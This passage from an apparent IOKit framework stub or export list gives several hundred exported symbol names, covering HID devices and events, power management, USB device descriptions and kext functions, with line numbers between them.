_IOEthernetControllerRegisterPacketAvailableCallback, 203 | _IOEthernetControllerScheduleWithRunLoop, _IOEthernetControllerSetDispatchQueue, 204 | _IOEthernetControllerSetLinkStatus, _IOEthernetControllerSetPowerSavings, 205 | _IOEthernetControllerUnscheduleFromRunLoop, _IOEthernetControllerWritePacket, 206 | _IOGetSystemLoadAdvisory, _IOHIDCopyCFTypeParameter, 207 | _IOHIDCreateSharedMemory, _IOHIDDeviceClose, _IOHIDDeviceConformsTo, 208 | _IOHIDDeviceCopyMatchingElements, _IOHIDDeviceCopyValueMultiple, 209 | _IOHIDDeviceCopyValueMultipleWithCallback, _IOHIDDeviceCreate, 210 | _IOHIDDeviceGetProperty, _IOHIDDeviceGetReport, 211 | _IOHIDDeviceGetReportWithCallback, _IOHIDDeviceGetService, 212 | _IOHIDDeviceGetTypeID, _IOHIDDeviceGetValue, _IOHIDDeviceGetValueWithCallback, 213 | _IOHIDDeviceOpen, _IOHIDDeviceRegisterInputReportCallback, 214 | _IOHIDDeviceRegisterInputReportWithTimeStampCallback, 215 | _IOHIDDeviceRegisterInputValueCallback, _IOHIDDeviceRegisterRemovalCallback, 216 | _IOHIDDeviceScheduleWithRunLoop, _IOHIDDeviceSetInputValueMatching, 217 | _IOHIDDeviceSetInputValueMatchingMultiple, _IOHIDDeviceSetProperty, 218 | _IOHIDDeviceSetReport, _IOHIDDeviceSetReportWithCallback, 219 | _IOHIDDeviceSetValue, _IOHIDDeviceSetValueMultiple, 220 | _IOHIDDeviceSetValueMultipleWithCallback, _IOHIDDeviceSetValueWithCallback, 221 | _IOHIDDeviceUnscheduleFromRunLoop, _IOHIDElementAttach, 222 | _IOHIDElementCopyAttached, _IOHIDElementCreateWithDictionary, 223 | _IOHIDElementDetach, _IOHIDElementGetChildren, _IOHIDElementGetCollectionType, 224 | _IOHIDElementGetCookie, _IOHIDElementGetDevice, 225 | _IOHIDElementGetDuplicateIndex, _IOHIDElementGetLogicalMax, 226 | _IOHIDElementGetLogicalMin, _IOHIDElementGetName, 227 | _IOHIDElementGetParent, _IOHIDElementGetPhysicalMax, 228 | _IOHIDElementGetPhysicalMin, _IOHIDElementGetProperty, 229 | _IOHIDElementGetReportCount, _IOHIDElementGetReportID, 230 | _IOHIDElementGetReportSize, _IOHIDElementGetType, 231 | 
_IOHIDElementGetTypeID, _IOHIDElementGetUnit, _IOHIDElementGetUnitExponent, 232 | _IOHIDElementGetUsage, _IOHIDElementGetUsagePage, 233 | _IOHIDElementHasNullState, _IOHIDElementHasPreferredState, 234 | _IOHIDElementIsArray, _IOHIDElementIsNonLinear, 235 | _IOHIDElementIsRelative, _IOHIDElementIsVirtual, 236 | _IOHIDElementIsWrapping, _IOHIDElementSetProperty, 237 | _IOHIDEventAppendEvent, _IOHIDEventConformsTo, _IOHIDEventConformsToWithOptions, 238 | _IOHIDEventCreate, _IOHIDEventCreateAccelerometerEvent, 239 | _IOHIDEventCreateAccelerometerEventWithType, _IOHIDEventCreateAmbientLightSensorEvent, 240 | _IOHIDEventCreateAtmosphericPressureEvent, _IOHIDEventCreateBiometricEvent, 241 | _IOHIDEventCreateBoundaryScrollEvent, _IOHIDEventCreateButtonEvent, 242 | _IOHIDEventCreateButtonEventWithPressure, _IOHIDEventCreateCompassEvent, 243 | _IOHIDEventCreateCompassEventWithType, _IOHIDEventCreateCopy, 244 | _IOHIDEventCreateData, _IOHIDEventCreateDigitizerEvent, 245 | _IOHIDEventCreateDigitizerFingerEvent, _IOHIDEventCreateDigitizerFingerEventWithQuality, 246 | _IOHIDEventCreateDigitizerStylusEvent, _IOHIDEventCreateDigitizerStylusEventWithPolarOrientation, 247 | _IOHIDEventCreateDockSwipeEvent, _IOHIDEventCreateFluidTouchGestureEvent, 248 | _IOHIDEventCreateForceEvent, _IOHIDEventCreateGyroEvent, 249 | _IOHIDEventCreateGyroEventWithType, _IOHIDEventCreateKeyboardEvent, 250 | _IOHIDEventCreateLEDEvent, _IOHIDEventCreateMotionActivtyEvent, 251 | _IOHIDEventCreateMotionGestureEvent, _IOHIDEventCreateMouseEvent, 252 | _IOHIDEventCreateNavigationSwipeEvent, _IOHIDEventCreateOrientationEvent, 253 | _IOHIDEventCreatePolarOrientationEvent, _IOHIDEventCreateProgressEvent, 254 | _IOHIDEventCreateProximtyEvent, _IOHIDEventCreateRelativePointerEvent, 255 | _IOHIDEventCreateRotationEvent, _IOHIDEventCreateScaleEvent, 256 | _IOHIDEventCreateScrollEvent, _IOHIDEventCreateSwipeEvent, 257 | _IOHIDEventCreateSymbolicHotKeyEvent, _IOHIDEventCreateTranslationEvent, 258 | 
_IOHIDEventCreateUnicodeEvent, _IOHIDEventCreateUnicodeEventWithQuality, 259 | _IOHIDEventCreateVelocityEvent, _IOHIDEventCreateVendorDefinedEvent, 260 | _IOHIDEventCreateWithBytes, _IOHIDEventCreateWithData, 261 | _IOHIDEventCreateZoomToggleEvent, _IOHIDEventGetAttributeData, 262 | _IOHIDEventGetAttributeDataLength, _IOHIDEventGetAttributeDataPtr, 263 | _IOHIDEventGetChildren, _IOHIDEventGetDataLength, 264 | _IOHIDEventGetDataValue, _IOHIDEventGetDataValueWithOptions, 265 | _IOHIDEventGetEvent, _IOHIDEventGetEventFlags, _IOHIDEventGetEventWithOptions, 266 | _IOHIDEventGetFloatMultiple, _IOHIDEventGetFloatMultipleWithOptions, 267 | _IOHIDEventGetFloatValue, _IOHIDEventGetFloatValueWithOptions, 268 | _IOHIDEventGetIntegerMultiple, _IOHIDEventGetIntegerMultipleWithOptions, 269 | _IOHIDEventGetIntegerValue, _IOHIDEventGetIntegerValueWithOptions, 270 | _IOHIDEventGetLatency, _IOHIDEventGetParent, _IOHIDEventGetPhase, 271 | _IOHIDEventGetPosition, _IOHIDEventGetPositionWithOptions, 272 | _IOHIDEventGetSenderID, _IOHIDEventGetTimeStamp, 273 | _IOHIDEventGetType, _IOHIDEventGetTypeID, _IOHIDEventGetTypeString, 274 | _IOHIDEventGetVendorDefinedData, _IOHIDEventIsAbsolute, 275 | _IOHIDEventIsRepeat, _IOHIDEventQueueCreate, _IOHIDEventQueueCreateWithVM, 276 | _IOHIDEventQueueDequeueCopy, _IOHIDEventQueueEnqueue, 277 | _IOHIDEventQueueGetMemoryHandle, _IOHIDEventQueueGetNotificationPort, 278 | _IOHIDEventQueueGetTypeID, _IOHIDEventQueueIsActive, 279 | _IOHIDEventQueueSetNotificationPort, _IOHIDEventQueueStart, 280 | _IOHIDEventQueueStop, _IOHIDEventReadBytes, _IOHIDEventRemoveEvent, 281 | _IOHIDEventServerCreate, _IOHIDEventServerGetTypeID, 282 | _IOHIDEventServerScheduleWithDispatchQueue, _IOHIDEventServerUnscheduleFromDispatchQueue, 283 | _IOHIDEventSetAttributeData, _IOHIDEventSetEventFlags, 284 | _IOHIDEventSetFloatMultiple, _IOHIDEventSetFloatMultipleWithOptions, 285 | _IOHIDEventSetFloatValue, _IOHIDEventSetFloatValueWithOptions, 286 | _IOHIDEventSetIntegerMultiple, 
_IOHIDEventSetIntegerMultipleWithOptions, 287 | _IOHIDEventSetIntegerValue, _IOHIDEventSetIntegerValueWithOptions, 288 | _IOHIDEventSetPhase, _IOHIDEventSetPosition, _IOHIDEventSetPositionWithOptions, 289 | _IOHIDEventSetRepeat, _IOHIDEventSetSenderID, _IOHIDEventSetTimeStamp, 290 | _IOHIDEventSystemClient, _IOHIDEventSystemClientCopyProperty, 291 | _IOHIDEventSystemClientCopyServiceForRegistryID, 292 | _IOHIDEventSystemClientCopyServices, _IOHIDEventSystemClientCreate, 293 | _IOHIDEventSystemClientCreateWithType, _IOHIDEventSystemClientDispatchEvent, 294 | _IOHIDEventSystemClientGetTypeID, _IOHIDEventSystemClientGetTypeString, 295 | _IOHIDEventSystemClientRegisterDeviceMatchingBlock, 296 | _IOHIDEventSystemClientRegisterDeviceMatchingCallback, 297 | _IOHIDEventSystemClientRegisterEventBlock, _IOHIDEventSystemClientRegisterEventCallback, 298 | _IOHIDEventSystemClientRegisterEventFilterBlock, 299 | _IOHIDEventSystemClientRegisterEventFilterBlockWithPriority, 300 | _IOHIDEventSystemClientRegisterEventFilterCallback, 301 | _IOHIDEventSystemClientRegisterEventFilterCallbackWithPriority, 302 | _IOHIDEventSystemClientRegisterPropertyChangedCallback, 303 | _IOHIDEventSystemClientRegisterResetCallback, _IOHIDEventSystemClientRegistryIDConformsTo, 304 | _IOHIDEventSystemClientScheduleWithDispatchQueue, 305 | _IOHIDEventSystemClientScheduleWithRunLoop, _IOHIDEventSystemClientSetMatching, 306 | _IOHIDEventSystemClientSetMatchingMultiple, _IOHIDEventSystemClientSetProperty, 307 | _IOHIDEventSystemClientUnregisterDeviceMatchingBlock, 308 | _IOHIDEventSystemClientUnregisterDeviceMatchingCallback, 309 | _IOHIDEventSystemClientUnregisterEventBlock, _IOHIDEventSystemClientUnregisterEventCallback, 310 | _IOHIDEventSystemClientUnregisterEventFilterBlock, 311 | _IOHIDEventSystemClientUnregisterEventFilterCallback, 312 | _IOHIDEventSystemClientUnregisterPropertyChangedCallback, 313 | _IOHIDEventSystemClientUnregisterResetCallback, 314 | 
_IOHIDEventSystemClientUnscheduleFromDispatchQueue, 315 | _IOHIDEventSystemClientUnscheduleWithRunLoop, _IOHIDEventSystemClose, 316 | _IOHIDEventSystemConnectionDispatchEvent, _IOHIDEventSystemConnectionGetAttribute, 317 | _IOHIDEventSystemConnectionGetTask, _IOHIDEventSystemConnectionGetType, 318 | _IOHIDEventSystemConnectionGetTypeID, _IOHIDEventSystemConnectionGetTypeString, 319 | _IOHIDEventSystemCopyConnections, _IOHIDEventSystemCopyEvent, 320 | _IOHIDEventSystemCopyMatchingServices, _IOHIDEventSystemCopyService, 321 | _IOHIDEventSystemCopyServices, _IOHIDEventSystemCreate, 322 | _IOHIDEventSystemGetProperty, _IOHIDEventSystemGetTypeID, 323 | _IOHIDEventSystemOpen, _IOHIDEventSystemRegisterConnectionAdditionCallback, 324 | _IOHIDEventSystemRegisterConnectionRemovalCallback, 325 | _IOHIDEventSystemRegisterServicesCallback, _IOHIDEventSystemSetCallback, 326 | _IOHIDEventSystemSetProperty, _IOHIDEventSystemUnregisterConnectionAdditionCallback, 327 | _IOHIDEventSystemUnregisterConnectionRemovalCallback, 328 | _IOHIDEventSystemUnregisterServicesCallback, _IOHIDEventTypeGetName, 329 | _IOHIDGetAccelerationWithKey, _IOHIDGetActivityState, 330 | _IOHIDGetButtonEventNum, _IOHIDGetModifierLockState, 331 | _IOHIDGetMouseAcceleration, _IOHIDGetMouseButtonMode, 332 | _IOHIDGetParameter, _IOHIDGetScrollAcceleration, 333 | _IOHIDGetStateForSelector, _IOHIDManagerClose, _IOHIDManagerCopyDevices, 334 | _IOHIDManagerCreate, _IOHIDManagerGetProperty, _IOHIDManagerGetTypeID, 335 | _IOHIDManagerOpen, _IOHIDManagerRegisterDeviceMatchingCallback, 336 | _IOHIDManagerRegisterDeviceRemovalCallback, _IOHIDManagerRegisterInputReportCallback, 337 | _IOHIDManagerRegisterInputValueCallback, _IOHIDManagerSaveToPropertyDomain, 338 | _IOHIDManagerScheduleWithRunLoop, _IOHIDManagerSetDeviceMatching, 339 | _IOHIDManagerSetDeviceMatchingMultiple, _IOHIDManagerSetInputValueMatching, 340 | _IOHIDManagerSetInputValueMatchingMultiple, _IOHIDManagerSetProperty, 341 | 
_IOHIDManagerUnscheduleFromRunLoop, _IOHIDNotificationCreate, 342 | _IOHIDNotificationGetClientCallback, _IOHIDNotificationGetClientRefcon, 343 | _IOHIDNotificationGetClientTarget, _IOHIDNotificationGetOwnerCallback, 344 | _IOHIDNotificationGetOwnerRefcon, _IOHIDNotificationGetOwnerTarget, 345 | _IOHIDNotificationGetTypeID, _IOHIDPostEvent, _IOHIDQueueAddElement, 346 | _IOHIDQueueContainsElement, _IOHIDQueueCopyNextValue, 347 | _IOHIDQueueCopyNextValueWithTimeout, _IOHIDQueueCreate, 348 | _IOHIDQueueGetDepth, _IOHIDQueueGetDevice, _IOHIDQueueGetTypeID, 349 | _IOHIDQueueRegisterValueAvailableCallback, _IOHIDQueueRemoveElement, 350 | _IOHIDQueueScheduleWithRunLoop, _IOHIDQueueSetDepth, 351 | _IOHIDQueueStart, _IOHIDQueueStop, _IOHIDQueueUnscheduleFromRunLoop, 352 | _IOHIDRegisterVirtualDisplay, _IOHIDServiceClientConformsTo, 353 | _IOHIDServiceClientCopyEvent, _IOHIDServiceClientCopyProperty, 354 | _IOHIDServiceClientGetRegistryID, _IOHIDServiceClientGetTypeID, 355 | _IOHIDServiceClientRegisterRemovalBlock, _IOHIDServiceClientRegisterRemovalCallback, 356 | _IOHIDServiceClientSetElementValue, _IOHIDServiceClientSetProperty, 357 | _IOHIDServiceConformsTo, _IOHIDServiceConnectionCacheContainsKey, 358 | _IOHIDServiceConnectionCacheCopyValueForKey, _IOHIDServiceConnectionCacheCreate, 359 | _IOHIDServiceConnectionCacheGetReportDeadline, _IOHIDServiceConnectionCacheGetTypeID, 360 | _IOHIDServiceConnectionCacheGetUnresponsiveness, 361 | _IOHIDServiceConnectionCacheSetReportDeadline, _IOHIDServiceConnectionCacheSetUnresponsiveness, 362 | _IOHIDServiceConnectionCacheSetValueForKey, _IOHIDServiceCopyEvent, 363 | _IOHIDServiceCopyProperty, _IOHIDServiceCreatePropertyChangedNotification, 364 | _IOHIDServiceCreateRemovalNotification, _IOHIDServiceFilterClose, 365 | _IOHIDServiceFilterCopyPropertyForClient, _IOHIDServiceFilterCreate, 366 | _IOHIDServiceFilterFilterCopyEvent, _IOHIDServiceFilterFilterEvent, 367 | _IOHIDServiceFilterGetType, _IOHIDServiceFilterGetTypeID, 368 | 
_IOHIDServiceFilterMatch, _IOHIDServiceFilterOpen, 369 | _IOHIDServiceFilterSchedule, _IOHIDServiceFilterSetEventCallback, 370 | _IOHIDServiceFilterSetOutputEvent, _IOHIDServiceFilterSetPropertyForClient, 371 | _IOHIDServiceFilterUnschedule, _IOHIDServiceGetProperty, 372 | _IOHIDServiceGetRegistryID, _IOHIDServiceGetTypeID, 373 | _IOHIDServiceMatchPropertyTable, _IOHIDServiceSetElementValue, 374 | _IOHIDServiceSetOutputEvent, _IOHIDServiceSetProperty, 375 | _IOHIDSessionAddService, _IOHIDSessionClose, _IOHIDSessionCopyEvent, 376 | _IOHIDSessionCreate, _IOHIDSessionFilterClose, _IOHIDSessionFilterCopyEvent, 377 | _IOHIDSessionFilterCreate, _IOHIDSessionFilterFilterCopyEvent, 378 | _IOHIDSessionFilterFilterEvent, _IOHIDSessionFilterGetPropertyForClient, 379 | _IOHIDSessionFilterGetType, _IOHIDSessionFilterGetTypeID, 380 | _IOHIDSessionFilterOpen, _IOHIDSessionFilterRegisterService, 381 | _IOHIDSessionFilterScheduleWithDispatchQueue, _IOHIDSessionFilterSetPropertyForClient, 382 | _IOHIDSessionFilterUnregisterService, _IOHIDSessionFilterUnscheduleFromDispatchQueue, 383 | _IOHIDSessionGetProperty, _IOHIDSessionGetTypeID, 384 | _IOHIDSessionOpen, _IOHIDSessionRemoveService, _IOHIDSessionSetProperty, 385 | _IOHIDSetAccelerationWithKey, _IOHIDSetCFTypeParameter, 386 | _IOHIDSetCursorBounds, _IOHIDSetCursorEnable, _IOHIDSetEventsEnable, 387 | _IOHIDSetFixedMouseLocation, _IOHIDSetModifierLockState, 388 | _IOHIDSetMouseAcceleration, _IOHIDSetMouseButtonMode, 389 | _IOHIDSetMouseLocation, _IOHIDSetOnScreenCursorBounds, 390 | _IOHIDSetParameter, _IOHIDSetScrollAcceleration, 391 | _IOHIDSetStateForSelector, _IOHIDSetVirtualDisplayBounds, 392 | _IOHIDTransactionAddElement, _IOHIDTransactionClear, 393 | _IOHIDTransactionCommit, _IOHIDTransactionCommitWithCallback, 394 | _IOHIDTransactionContainsElement, _IOHIDTransactionCreate, 395 | _IOHIDTransactionGetDevice, _IOHIDTransactionGetDirection, 396 | _IOHIDTransactionGetTypeID, _IOHIDTransactionGetValue, 397 | 
_IOHIDTransactionRemoveElement, _IOHIDTransactionScheduleWithRunLoop, 398 | _IOHIDTransactionSetDirection, _IOHIDTransactionSetValue, 399 | _IOHIDTransactionUnscheduleFromRunLoop, _IOHIDUnregisterVirtualDisplay, 400 | _IOHIDUserDeviceCreate, _IOHIDUserDeviceCreateWithOptions, 401 | _IOHIDUserDeviceGetTypeID, _IOHIDUserDeviceHandleReport, 402 | _IOHIDUserDeviceHandleReportAsync, _IOHIDUserDeviceHandleReportAsyncWithTimeStamp, 403 | _IOHIDUserDeviceHandleReportWithTimeStamp, _IOHIDUserDeviceRegisterGetReportCallback, 404 | _IOHIDUserDeviceRegisterGetReportWithReturnLengthCallback, 405 | _IOHIDUserDeviceRegisterSetReportCallback, _IOHIDUserDeviceScheduleWithDispatchQueue, 406 | _IOHIDUserDeviceScheduleWithRunLoop, _IOHIDUserDeviceUnscheduleFromDispatchQueue, 407 | _IOHIDUserDeviceUnscheduleFromRunLoop, _IOHIDValueCreateWithBytes, 408 | _IOHIDValueCreateWithBytesNoCopy, _IOHIDValueCreateWithIntegerValue, 409 | _IOHIDValueGetBytePtr, _IOHIDValueGetElement, _IOHIDValueGetIntegerValue, 410 | _IOHIDValueGetLength, _IOHIDValueGetScaledValue, 411 | _IOHIDValueGetTimeStamp, _IOHIDValueGetTypeID, _IOInitContainerClasses, 412 | _IOIteratorIsValid, _IOIteratorNext, _IOIteratorReset, 413 | _IOKitGetBusyState, _IOKitWaitQuiet, _IOMIGMachPortCacheAdd, 414 | _IOMIGMachPortCacheCopy, _IOMIGMachPortCacheRemove, 415 | _IOMIGMachPortCreate, _IOMIGMachPortGetPort, _IOMIGMachPortGetTypeID, 416 | _IOMIGMachPortRegisterDemuxCallback, _IOMIGMachPortRegisterTerminationCallback, 417 | _IOMIGMachPortScheduleWithDispatchQueue, _IOMIGMachPortScheduleWithRunLoop, 418 | _IOMIGMachPortUnscheduleFromDispatchQueue, _IOMIGMachPortUnscheduleFromRunLoop, 419 | _IOMasterPort, _IONetworkClose, _IONetworkGetDataCapacity, 420 | _IONetworkGetDataHandle, _IONetworkGetPacketFiltersMask, 421 | _IONetworkOpen, _IONetworkReadData, _IONetworkResetData, 422 | _IONetworkSetPacketFiltersMask, _IONetworkWriteData, 423 | _IONotificationPortCreate, _IONotificationPortDestroy, 424 | _IONotificationPortGetMachPort, 
_IONotificationPortGetRunLoopSource, 425 | _IONotificationPortSetDispatchQueue, _IOObjectConformsTo, 426 | _IOObjectCopyBundleIdentifierForClass, _IOObjectCopyClass, 427 | _IOObjectCopySuperclassForClass, _IOObjectGetClass, 428 | _IOObjectGetKernelRetainCount, _IOObjectGetRetainCount, 429 | _IOObjectGetUserRetainCount, _IOObjectIsEqualTo, 430 | _IOObjectRelease, _IOObjectRetain, _IOOpenConnection, 431 | _IOOpenFirmwarePathMatching, _IOPMActivateSystemPowerSettings, 432 | _IOPMAllowsBackgroundTask, _IOPMAllowsPushServiceTask, 433 | _IOPMAssertionCopyProperties, _IOPMAssertionCreate, 434 | _IOPMAssertionCreateWithDescription, _IOPMAssertionCreateWithName, 435 | _IOPMAssertionCreateWithProperties, _IOPMAssertionDeclareNotificationEvent, 436 | _IOPMAssertionDeclareSystemActivity, _IOPMAssertionDeclareUserActivity, 437 | _IOPMAssertionNotify, _IOPMAssertionRelease, _IOPMAssertionRetain, 438 | _IOPMAssertionSetBTCollection, _IOPMAssertionSetProperty, 439 | _IOPMAssertionSetTimeout, _IOPMCancelAllRepeatingPowerEvents, 440 | _IOPMCancelAllScheduledPowerEvents, _IOPMCancelScheduledPowerEvent, 441 | _IOPMChangeSystemActivityAssertionBehavior, _IOPMClaimSystemWakeEvent, 442 | _IOPMConnectionAcknowledgeEvent, _IOPMConnectionAcknowledgeEventWithOptions, 443 | _IOPMConnectionCreate, _IOPMConnectionGetSystemCapabilities, 444 | _IOPMConnectionRelease, _IOPMConnectionScheduleWithRunLoop, 445 | _IOPMConnectionSetDispatchQueue, _IOPMConnectionSetNotification, 446 | _IOPMConnectionUnscheduleFromRunLoop, _IOPMCopyActivePMPreferences, 447 | _IOPMCopyActivePowerProfiles, _IOPMCopyAssertionActivityAggregate, 448 | _IOPMCopyAssertionActivityAggregateWithAllocator, 449 | _IOPMCopyAssertionActivityLog, _IOPMCopyAssertionActivityLogWithAllocator, 450 | _IOPMCopyAssertionActivityUpdate, _IOPMCopyAssertionActivityUpdateWithAllocator, 451 | _IOPMCopyAssertionsByProcess, _IOPMCopyAssertionsByProcessWithAllocator, 452 | _IOPMCopyAssertionsByType, _IOPMCopyAssertionsStatus, 453 | 
_IOPMCopyBatteryInfo, _IOPMCopyCPUPowerStatus, _IOPMCopyConnectionStatus, 454 | _IOPMCopyCustomPMPreferences, _IOPMCopyHIDPostEventHistory, 455 | _IOPMCopyPMPreferences, _IOPMCopyPowerHistory, _IOPMCopyPowerHistoryDetailed, 456 | _IOPMCopyPowerProfiles, _IOPMCopyPowerStateInfo, 457 | _IOPMCopyRepeatingPowerEvents, _IOPMCopyScheduledPowerEvents, 458 | _IOPMCopySleepPreventersList, _IOPMCopySleepWakeFailure, 459 | _IOPMCopySystemPowerSettings, _IOPMCopyUPSShutdownLevels, 460 | _IOPMCopyUnabridgedActivePMPreferences, _IOPMCopyUserActivityLevelDescription, 461 | _IOPMCtlAssertionType, _IOPMDebugTracePoint, _IOPMDeclareNetworkClientActivity, 462 | _IOPMFeatureIsAvailable, _IOPMFeatureIsAvailableWithSupportedTable, 463 | _IOPMFindPowerManagement, _IOPMGetActivePushConnectionState, 464 | _IOPMGetAggressiveness, _IOPMGetCapabilitiesDescription, 465 | _IOPMGetDarkWakeThermalEmergencyCount, _IOPMGetLastWakeTime, 466 | _IOPMGetPerformanceWarningLevel, _IOPMGetSleepServicesActive, 467 | _IOPMGetThermalWarningLevel, _IOPMGetUUID, _IOPMGetUserActivityLevel, 468 | _IOPMGetValueInt, _IOPMIsADarkWake, _IOPMIsASilentWake, 469 | _IOPMIsASleep, _IOPMIsAUserWake, _IOPMOverrideDefaultPMPreferences, 470 | _IOPMPerformBlockWithAssertion, _IOPMPrefsNotificationCreateRunLoopSource, 471 | _IOPMRequestSysWake, _IOPMRevertPMPreferences, _IOPMSchedulePowerEvent, 472 | _IOPMScheduleRepeatingPowerEvent, _IOPMScheduleUserActiveChangedNotification, 473 | _IOPMScheduleUserActivityLevelNotification, _IOPMSetActivePowerProfiles, 474 | _IOPMSetActivePushConnectionState, _IOPMSetAggressiveness, 475 | _IOPMSetAssertionActivityAggregate, _IOPMSetAssertionActivityLog, 476 | _IOPMSetBTWakeInterval, _IOPMSetCustomPMPreferences, 477 | _IOPMSetDWLingerInterval, _IOPMSetDebugFlags, _IOPMSetPMPreferences, 478 | _IOPMSetReservePowerMode, _IOPMSetSleepServicesWakeTimeCap, 479 | _IOPMSetSystemPowerSetting, _IOPMSetUPSShutdownLevels, 480 | _IOPMSetValueInt, _IOPMSleepEnabled, _IOPMSleepSystem, 481 | 
_IOPMSleepSystemWithOptions, _IOPMSleepWakeCopyUUID, 482 | _IOPMSleepWakeSetUUID, _IOPMUnregisterNotification, 483 | _IOPMUserDidChangeCallback, _IOPMUserIsActive, _IOPSAccCreateAttachNotification, 484 | _IOPSAccCreateLimitedPowerNotification, _IOPSAccNotificationCreateRunLoopSource, 485 | _IOPSCopyChargeLog, _IOPSCopyExternalPowerAdapterDetails, 486 | _IOPSCopyInternalBatteriesArray, _IOPSCopyPowerSourcesByType, 487 | _IOPSCopyPowerSourcesInfo, _IOPSCopyPowerSourcesList, 488 | _IOPSCopyUPSArray, _IOPSCreateLimitedPowerNotification, 489 | _IOPSCreatePowerSource, _IOPSDrawingUnlimitedPower, 490 | _IOPSGetActiveBattery, _IOPSGetActiveUPS, _IOPSGetBatteryWarningLevel, 491 | _IOPSGetPercentRemaining, _IOPSGetPowerSourceDescription, 492 | _IOPSGetProvidingPowerSourceType, _IOPSGetSupportedPowerSources, 493 | _IOPSGetTimeRemainingEstimate, _IOPSNotificationCreateRunLoopSource, 494 | _IOPSPowerSourceSupported, _IOPSReleasePowerSource, 495 | _IOPSRequestBatteryUpdate, _IOPSSetPowerSourceDetails, 496 | _IORegisterApp, _IORegisterClient, _IORegisterForSystemPower, 497 | _IORegistryCreateEnumerator, _IORegistryCreateIterator, 498 | _IORegistryDisposeEnumerator, _IORegistryEntryCopyFromPath, 499 | _IORegistryEntryCopyPath, _IORegistryEntryCreateCFProperties, 500 | _IORegistryEntryCreateCFProperty, _IORegistryEntryCreateIterator, 501 | _IORegistryEntryFromPath, _IORegistryEntryGetChildEntry, 502 | _IORegistryEntryGetChildIterator, _IORegistryEntryGetLocationInPlane, 503 | _IORegistryEntryGetName, _IORegistryEntryGetNameInPlane, 504 | _IORegistryEntryGetParentEntry, _IORegistryEntryGetParentIterator, 505 | _IORegistryEntryGetPath, _IORegistryEntryGetProperty, 506 | _IORegistryEntryGetRegistryEntryID, _IORegistryEntryIDMatching, 507 | _IORegistryEntryInPlane, _IORegistryEntrySearchCFProperty, 508 | _IORegistryEntrySetCFProperties, _IORegistryEntrySetCFProperty, 509 | _IORegistryEnumeratorNextConforming, _IORegistryEnumeratorReset, 510 | _IORegistryGetRootEntry, 
_IORegistryIteratorEnterEntry, 511 | _IORegistryIteratorExitEntry, _IOServiceAddInterestNotification, 512 | _IOServiceAddMatchingNotification, _IOServiceAddNotification, 513 | _IOServiceAuthorize, _IOServiceClose, _IOServiceGetBusyState, 514 | _IOServiceGetBusyStateAndTime, _IOServiceGetMatchingService, 515 | _IOServiceGetMatchingServices, _IOServiceGetState, 516 | _IOServiceMatchPropertyTable, _IOServiceMatching, 517 | _IOServiceNameMatching, _IOServiceOFPathToBSDName, 518 | _IOServiceOpen, _IOServiceOpenAsFileDescriptor, 519 | _IOServiceRequestProbe, _IOServiceWaitQuiet, _IOSetNotificationPort, 520 | _IOURLCreateDataAndPropertiesFromResource, _IOURLCreatePropertyFromResource, 521 | _IOUSBDevicDeviceDescriptionGetTypeID, _IOUSBDeviceControllerCreate, 522 | _IOUSBDeviceControllerCreateDefaultDescription, 523 | _IOUSBDeviceControllerCreateWithService, _IOUSBDeviceControllerForceOffBus, 524 | _IOUSBDeviceControllerGetService, _IOUSBDeviceControllerGetTypeID, 525 | _IOUSBDeviceControllerGoOffAndOnBus, _IOUSBDeviceControllerRegisterArrivalCallback, 526 | _IOUSBDeviceControllerRemoveArrivalCallback, _IOUSBDeviceControllerSendCommand, 527 | _IOUSBDeviceControllerSetDescription, _IOUSBDeviceControllerSetPreferredConfiguration, 528 | _IOUSBDeviceDataCreate, _IOUSBDeviceDataGetBytePtr, 529 | _IOUSBDeviceDataGetCapacity, _IOUSBDeviceDataGetMapToken, 530 | _IOUSBDeviceDataGetTypeID, _IOUSBDeviceDescriptionAppendConfiguration, 531 | _IOUSBDeviceDescriptionAppendConfigurationWithInterface, 532 | _IOUSBDeviceDescriptionAppendConfigurationWithInterfaces, 533 | _IOUSBDeviceDescriptionAppendConfigurationWithoutAttributes, 534 | _IOUSBDeviceDescriptionAppendInterfaceToConfiguration, 535 | _IOUSBDeviceDescriptionAppendInterfacesToConfiguration, 536 | _IOUSBDeviceDescriptionCopyInterfaces, _IOUSBDeviceDescriptionCreate, 537 | _IOUSBDeviceDescriptionCreateFromController, _IOUSBDeviceDescriptionCreateFromControllerWithType, 538 | _IOUSBDeviceDescriptionCreateFromDefaults, 
_IOUSBDeviceDescriptionCreateFromDefaultsAndController, 539 | _IOUSBDeviceDescriptionCreateWithConfigurationInterfaces, 540 | _IOUSBDeviceDescriptionCreateWithType, _IOUSBDeviceDescriptionGetAllowOverride, 541 | _IOUSBDeviceDescriptionGetClass, _IOUSBDeviceDescriptionGetManufacturerString, 542 | _IOUSBDeviceDescriptionGetMatchingConfiguration, 543 | _IOUSBDeviceDescriptionGetProductID, _IOUSBDeviceDescriptionGetProductString, 544 | _IOUSBDeviceDescriptionGetProtocol, _IOUSBDeviceDescriptionGetSerialString, 545 | _IOUSBDeviceDescriptionGetSubClass, _IOUSBDeviceDescriptionGetVendorID, 546 | _IOUSBDeviceDescriptionGetVersion, _IOUSBDeviceDescriptionRemoveAllConfigurations, 547 | _IOUSBDeviceDescriptionSetAllowOverride, _IOUSBDeviceDescriptionSetClass, 548 | _IOUSBDeviceDescriptionSetProductID, _IOUSBDeviceDescriptionSetProtocol, 549 | _IOUSBDeviceDescriptionSetSerialString, _IOUSBDeviceDescriptionSetSubClass, 550 | _IOUSBDeviceDescriptionSetVendorID, _NXClickTime, 551 | _NXCloseEventStatus, _NXEventSystemInfo, _NXGetClickSpace, 552 | _NXGetKeyMapping, _NXKeyMappingLength, _NXKeyRepeatInterval, 553 | _NXKeyRepeatThreshold, _NXOpenEventStatus, _NXResetKeyboard, 554 | _NXResetMouse, _NXSetClickSpace, _NXSetClickTime, 555 | _NXSetKeyMapping, _NXSetKeyRepeatInterval, _NXSetKeyRepeatThreshold, 556 | _OSGetNotificationFromMessage, _OSKextAuthenticate, 557 | _OSKextAuthenticateDependencies, _OSKextCopyAllDependencies, 558 | _OSKextCopyAllRequestedIdentifiers, _OSKextCopyArchitectures, 559 | _OSKextCopyContainerForPluginKext, _OSKextCopyDeclaredDependencies, 560 | _OSKextCopyDependents, _OSKextCopyDiagnostics, _OSKextCopyExecutableForArchitecture, 561 | _OSKextCopyIndirectDependencies, _OSKextCopyInfoDictionary, 562 | _OSKextCopyKextsWithIdentifier, _OSKextCopyKextsWithIdentifiers, 563 | _OSKextCopyLinkDependencies, _OSKextCopyLoadList, 564 | _OSKextCopyLoadListForKexts, _OSKextCopyLoadedKextInfo, 565 | _OSKextCopyPersonalitiesArray, 